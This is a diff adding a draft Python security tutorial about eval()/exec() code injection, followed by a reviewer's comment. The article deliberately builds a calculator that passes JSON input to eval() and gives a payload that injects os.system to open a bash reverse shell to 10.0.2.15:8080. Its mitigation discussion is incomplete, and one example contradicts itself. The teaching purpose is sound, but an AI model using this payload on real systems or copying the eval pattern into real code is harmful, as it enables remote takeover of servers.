articles/securing-your-python-application-from-hackers/index.md

```diff
@@ -0,0 +1,174 @@
+Let's make a simple python app:
+```python
+def addition(x, y):
+  return eval("%s + %s" % (x, y))
+
+result = addition(2, 4)
+print(result)
+```
+
+This is a very simple calculator, which gives you the sum of two numbers. If you execute the code, then you will have `6` as a result.
+
+Now let's turn this calculator to an application that uses JSON to pass user input:
+```python
+def addition(x, y):
+  return eval("%s + %s" % (x, y))
+
+result = addition(request.json['x'], request.json['y'])
+print("Our result is %d." % result)
+```
+
+If we pass `{"x":"2", "y":"4"}` as our previous code, then the result will be `6` of course. But as we are thinking as a hacker, then let's try to provide something else:
+```python
+{"x":"__import__('os').system('bash -i >& /dev/tcp/10.0.2.15/8080 0>&1')#", "y":"4"}
+```
+
+This malicious code will force our calculator to call `os.system` then spawn a reverse shell to the IP "10.0.2.15" on PORT "8080".
+
+#### Exec()
+This function is just like `Eval()` which executes a string or a code object. You have just to replace the second line of our last code with:
+```python
+return exec("%s + %s" % (x, y))
+```
+
+And you can exploit it in the same way as we did before.
+
+Now if you want to use those functions, you have to check which methods and variables the user is allowed to use by:
+```python
+exec('print(dir())')
+```
+
+The output is:
+```
+['In', 'Out', '_', '__', '___', '__builtin__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', '_dh', '_i', '_i1', '_i2', '_i3', '_i4', '_i5', '_i6', '_i7', '_i8', '_ih', '_ii', '_iii', '_oh', 'addition', 'exit', 'get_ipython', 'quit', 'result']
+```
+
+A lot of those variables and methods may not be necessary for your code. Therefore, you can restrict it for users bypassing optional `locals` and `globals` parameters to the method.
+For example:
+```python
+from math import *
+exec('print(dir())')
+```
+
+Then the output will be:
+```
+['In', 'Out', '_', '__', '___', '__builtin__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', '_dh', '_i', '_i1', '_i10', '_i11', '_i2', '_i3', '_i4', '_i5', '_i6', '_i7', '_i8', '_i9', '_ih', '_ii', '_iii', '_oh', 'acos', 'acosh', 'addition', 'asin', 'asinh', 'atan', 'atan2', 'atanh', 'ceil', 'copysign', 'cos', 'cosh', 'degrees', 'e', 'erf', 'erfc', 'exit', 'exp', 'expm1', 'fabs', 'factorial', 'floor', 'fmod', 'frexp', 'fsum', 'gamma', 'gcd', 'get_ipython', 'hypot', 'inf', 'isclose', 'isfinite', 'isinf', 'isnan', 'ldexp', 'lgamma', 'log', 'log10', 'log1p', 'log2', 'math', 'modf', 'nan', 'pi', 'pow', 'quit', 'radians', 'remainder', 'result', 'sin', 'sinh', 'sqrt', 'tan', 'tanh', 'tau', 'trunc']
+```
+
+If we pass an empty dictionary as globals, then only the __builtins__ will be available to the object. That means if you try to access any of the functions which are available by the math module, then it will raise an exception:

```

Comment:
Can you provide an example of trying to access a function in the math module and it fails. You can show the output of the exception.